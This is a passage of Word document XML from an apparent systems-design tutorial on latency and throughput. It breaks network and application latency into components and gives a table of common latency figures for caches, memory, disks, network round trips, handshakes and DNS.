        <w:t xml:space="preserve">  Latency = 10ms, 1000 parallel workers → Throughput = 100,000 ops/sec</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49CFEC7E" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>You can increase throughput WITHOUT decreasing latency</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1994">
        <w:t> — by adding parallelism. And you can decrease latency WITHOUT increasing throughput — by optimizing the critical path of a single request without adding capacity.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48B083AD" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:pict w14:anchorId="3AF8C3A7">
          <v:rect id="_x0000_i5103" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="36B85EE3" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2. Latency — In Depth</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A1CF88A" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2.1 Types of Latency</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2477AA50" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Network latency (propagation + transmission + queuing + processing):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DCD9349" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72981149" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Total network latency = Propagation + Transmission + Queuing + Processing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EDC1F72" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994"/>
    <w:p w14:paraId="6DAF310D" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Propagation: distance / speed_of_light_in_medium</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74F9BB5A" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  - NYC → London (5,500 km): 5,500,000 / 200,000,000 = 27.5ms one-way</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B9560CF" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  - Same rack (2 meters): 2 / 200,000,000 = 10 nanoseconds</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CAFBB72" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994"/>
    <w:p w14:paraId="1CB6BA84" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Transmission: packet_size / link_bandwidth</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="291E12FA" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  - 1500 bytes on 1 Gbps: 1500×8 / 1,000,000,000 = 12 μs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01CABD11" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  - 1500 bytes on 10 Gbps: 1.2 μs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59C3EA26" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994"/>
    <w:p w14:paraId="4BFA9DC1" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Queuing: time spent waiting in router/switch buffers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6882DFCF" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  - 0 μs (no congestion) to 10+ ms (congested link)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FD0FB36" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  - Non-linear: grows dramatically as utilization → 100%</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F423FDB" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994"/>
    <w:p w14:paraId="7B986422" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Processing: time for router to process the packet header</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="204679AB" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  - Hardware switching: &lt; 1 μs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AB65EC6" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  - Software routing: 10–100 μs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="515EC0F9" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Application latency (compute + I/O + waiting):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B1DF1A4" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:lastRenderedPageBreak/>
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06CBEA9C" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Request processing latency:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57F427D4" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  = Network (client → server)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CA8E2F5" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  + Deserialization</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06179CE9" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  + Business logic (CPU)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52EB4A32" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  + Database query (I/O wait)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="278A38CE" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  + Serialization</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CB20C1A" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  + Network (server → client)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55873668" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994"/>
    <w:p w14:paraId="3F3F2273" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74197A7A" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  Network in:        5ms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="107C9F52" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  Deserialization:   0.5ms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17F8D027" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  Auth check (cache): 0.2ms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F5626F5" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  DB query:          15ms   ← Usually the dominant factor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67216715" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  Business logic:    2ms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="077C87EB" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  Serialization:     0.5ms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F76FC71" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  Network out:       5ms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22BF4C20" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  ─────────────────────────</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FD82FA2" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  Total:            28.2ms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43A822AF" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2.2 Latency Numbers Every Engineer Should Know</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947"/>
        <w:gridCol w:w="1640"/>
        <w:gridCol w:w="1003"/>
      </w:tblGrid>
      <w:tr w:rsidR="001F1994" w:rsidRPr="001F1994" w14:paraId="0F73C07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475C55" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001F1994">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Operation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ADEAAA" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001F1994">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Latency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106808" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001F1994">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Scale</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001F1994" w:rsidRPr="001F1994" w14:paraId="3399DAA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AA781B" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
            <w:r w:rsidRPr="001F1994">
              <w:t>L1 cache reference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CE8178" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
            <w:r w:rsidRPr="001F1994">
              <w:t>1 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49B461" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001F1994" w:rsidRPr="001F1994" w14:paraId="2E74755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655A2F" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
            <w:r w:rsidRPr="001F1994">
              <w:t>L2 cache reference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41950A" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
            <w:r w:rsidRPr="001F1994">
              <w:t>4 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FF83E9" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001F1994" w:rsidRPr="001F1994" w14:paraId="1A64213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C6291A" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
            <w:r w:rsidRPr="001F1994">
              <w:t>L3 cache reference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23A184" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
            <w:r w:rsidRPr="001F1994">
              <w:t>10–15 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F7FAFA" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001F1994" w:rsidRPr="001F1994" w14:paraId="72528CD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5BECFE" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
            <w:r w:rsidRPr="001F1994">
              <w:lastRenderedPageBreak/>
              <w:t>Main memory reference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9F78DA" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
            <w:r w:rsidRPr="001F1994">
              <w:t>50–100 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EC4652" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001F1994" w:rsidRPr="001F1994" w14:paraId="7F4BF64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F1A76F" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
            <w:r w:rsidRPr="001F1994">
              <w:t>Mutex lock/unlock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B1486E" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
            <w:r w:rsidRPr="001F1994">
              <w:t>25 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348E82" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001F1994" w:rsidRPr="001F1994" w14:paraId="7DC13FE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34E973" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
            <w:r w:rsidRPr="001F1994">
              <w:t>Send 1 KB over 1 Gbps network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ECB5D3" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
            <w:r w:rsidRPr="001F1994">
              <w:t>10 μs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08195A" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001F1994" w:rsidRPr="001F1994" w14:paraId="197A77A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BE43B5" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
            <w:r w:rsidRPr="001F1994">
              <w:t>SSD random read (4 KB)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386414" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
            <w:r w:rsidRPr="001F1994">
              <w:t>50–100 μs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640756" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001F1994" w:rsidRPr="001F1994" w14:paraId="1CD8729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4D6D55" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
            <w:r w:rsidRPr="001F1994">
              <w:t>Read 1 MB from SSD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680EAC" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
            <w:r w:rsidRPr="001F1994">
              <w:t>200–500 μs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07D08C" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001F1994" w:rsidRPr="001F1994" w14:paraId="3F9E2D1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AFC0C6" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
            <w:r w:rsidRPr="001F1994">
              <w:t>Round trip within same datacenter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834A31" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
            <w:r w:rsidRPr="001F1994">
              <w:t>0.5 ms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C2009C" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001F1994" w:rsidRPr="001F1994" w14:paraId="7176319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34FC6A" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
            <w:r w:rsidRPr="001F1994">
              <w:t>Read 1 MB from memory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C42A4D" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
            <w:r w:rsidRPr="001F1994">
              <w:t>10 μs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97A3DD" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001F1994" w:rsidRPr="001F1994" w14:paraId="0BC8D4E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598C07" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
            <w:r w:rsidRPr="001F1994">
              <w:t>HDD random read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5DD378" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
            <w:r w:rsidRPr="001F1994">
              <w:t>5–10 ms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865DCA" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001F1994" w:rsidRPr="001F1994" w14:paraId="624FC70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9C05BF" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
            <w:r w:rsidRPr="001F1994">
              <w:t>Read 1 MB from HDD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953ED7" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
            <w:r w:rsidRPr="001F1994">
              <w:t>5–10 ms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987866" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001F1994" w:rsidRPr="001F1994" w14:paraId="7086506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935FEA" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
            <w:r w:rsidRPr="001F1994">
              <w:t>Round trip US coast-to-coast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D35DF7" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
            <w:r w:rsidRPr="001F1994">
              <w:t>40–60 ms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C88AEB" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001F1994" w:rsidRPr="001F1994" w14:paraId="2749D19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C87DD9" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
            <w:r w:rsidRPr="001F1994">
              <w:t>Round trip US → Europe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90F1A3" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
            <w:r w:rsidRPr="001F1994">
              <w:t>75–120 ms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929AD0" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001F1994" w:rsidRPr="001F1994" w14:paraId="2B58E17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F95D66" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
            <w:r w:rsidRPr="001F1994">
              <w:t>Round trip US → Asia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80F4F5" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
            <w:r w:rsidRPr="001F1994">
              <w:t>150–250 ms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425238" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001F1994" w:rsidRPr="001F1994" w14:paraId="78DBF45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CDA79C" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
            <w:r w:rsidRPr="001F1994">
              <w:t>TLS handshake (TLS 1.2)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A3D34D" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
            <w:r w:rsidRPr="001F1994">
              <w:t>2 RTT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EE23B1" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001F1994" w:rsidRPr="001F1994" w14:paraId="08D927A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3ACDC2" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
            <w:r w:rsidRPr="001F1994">
              <w:t>TCP handshake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F45F05" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
            <w:r w:rsidRPr="001F1994">
              <w:t>1 RTT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EE30F5" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001F1994" w:rsidRPr="001F1994" w14:paraId="5C95007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D32D3A" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
            <w:r w:rsidRPr="001F1994">
              <w:t>DNS resolution (cold)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7AD1B3" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
            <w:r w:rsidRPr="001F1994">
              <w:t>20–120 ms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CBB2BD" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001F1994" w:rsidRPr="001F1994" w14:paraId="2B485C0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3F75D3" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
            <w:r w:rsidRPr="001F1994">
              <w:t>DNS resolution (cached)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97FA04" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
            <w:r w:rsidRPr="001F1994">
              <w:t>0–1 ms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5F478A" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994"/>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="11FFBC7C" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Key insight from these numbers:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AEE9427" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DB64AFF" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:lastRenderedPageBreak/>
        <w:t>Memory:       100 ns      (1x)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="656806A1" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>SSD:          100 μs      (1,000x slower than memory)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62D34134" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Network (DC): 500 μs      (5,000x slower than memory)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D794540" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>HDD:          10,000 μs   (100,000x slower than memory)</w:t>
      </w:r>
    </w:p>
